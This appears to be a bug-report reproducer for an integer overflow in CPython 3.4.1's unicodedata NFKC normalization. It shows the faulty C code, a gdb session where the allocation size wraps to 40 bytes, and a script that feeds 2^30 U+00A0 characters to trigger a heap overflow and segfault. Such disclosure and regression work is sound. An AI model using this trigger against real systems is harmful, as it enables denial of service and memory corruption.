# Bug
# ---
#
# static PyObject*
# unicodedata_normalize(PyObject *self, PyObject *args)
# {
#     ...
#     if (strcmp(form, "NFKC") == 0) {
#         if (is_normalized(self, input, 1, 1)) {
#             Py_INCREF(input);
#             return input;
#         }
#         return nfc_nfkc(self, input, 1);
#
# We need to pass the is_normalized() check (repeated \xa0 char takes care of
# that). nfc_nfkc calls:
#
# static PyObject*
# nfd_nfkd(PyObject *self, PyObject *input, int k)
# {
#     ...
#     Py_ssize_t space, isize;
#     ...
#     isize = PyUnicode_GET_LENGTH(input);
#     /* Overallocate at most 10 characters. */
#     space = (isize > 10 ? 10 : isize) + isize;
#     osize = space;
# 1   output = PyMem_Malloc(space * sizeof(Py_UCS4));
#
# 1. if isize=2^30, then space=2^30+10, so space*sizeof(Py_UCS4)=(2^30+10)*4 ==
#    40 (modulo 2^32), so PyMem_Malloc allocates a buffer too small to hold the
#    result.
#
# Crash
# -----
#
# nfd_nfkd (self=, input='...', k=1) at /home/p/Python-3.4.1/Modules/unicodedata.c:552
# 552         stackptr = 0;
# (gdb) n
# 553         isize = PyUnicode_GET_LENGTH(input);
# (gdb) n
# 555         space = (isize > 10 ? 10 : isize) + isize;
# (gdb) n
# 556         osize = space;
# (gdb) n
# 557         output = PyMem_Malloc(space * sizeof(Py_UCS4));
# (gdb) print space
# $9 = 1073741834
# (gdb) print space*4
# $10 = 40
# (gdb) c
# Continuing.
#
# Program received signal SIGSEGV, Segmentation fault.
# 0x40579cbb in nfd_nfkd (self=, input='', k=1) at /home/p/Python-3.4.1/Modules/unicodedata.c:614
# 614             output[o++] = code;
#
# OS info
# -------
#
# % ./python -V
# Python 3.4.1
#
# % uname -a
# Linux ubuntu 3.8.0-29-generic #42~precise1-Ubuntu SMP Wed Aug 14 15:31:16 UTC 2013 i686 i686 i386 GNU/Linux

import unicodedata as ud

# Input length used in the report above: with this many characters the
# allocation size (2**30 + 10) * 4 wraps to 40 modulo 2**32.
OVERFLOW_LENGTH = 2**30


def trigger_overflow(length=OVERFLOW_LENGTH):
    """Run NFKC normalization over a string of ``length`` U+00A0 characters.

    With the default length this is the reproducer for the report above:
    the repeated U+00A0 character gets the input past the is_normalized()
    early return, so the under-sized buffer in nfd_nfkd() is written to.
    Nothing is caught here on purpose; on the affected build the report
    shows the interpreter dying with SIGSEGV.

    Args:
        length: number of U+00A0 characters in the input string. The
            default builds a 2**30-character string, so it needs a
            correspondingly large amount of memory.

    Returns:
        The normalized string, when the call returns at all.
    """
    s = "\xa0" * length
    return ud.normalize("NFKC", s)


if __name__ == "__main__":
    # Only fire the full-size reproducer when executed as a script, so that
    # importing this file cannot take the interpreter down.
    trigger_overflow()